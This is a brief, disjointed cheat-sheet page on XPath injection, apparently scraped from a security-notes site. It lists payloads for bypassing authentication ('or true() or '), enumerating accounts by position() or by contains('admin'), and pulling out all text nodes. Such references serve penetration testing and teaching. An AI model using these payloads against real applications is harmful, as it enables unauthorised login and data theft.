XPath Injection
Authentication Bypass
'or true() or '
Data extraction
Blind XPAth Injection
Resources
Interesting Books
Interesting BooksLast updated
'or true() or '
Last updated
# Finding an interesting account
# Small DB - position() - increment the id
' or position()=1 '
# Large DB - contains() string
' or contains(., 'admin') or 'knownParameter' or '1'='1
random| // text()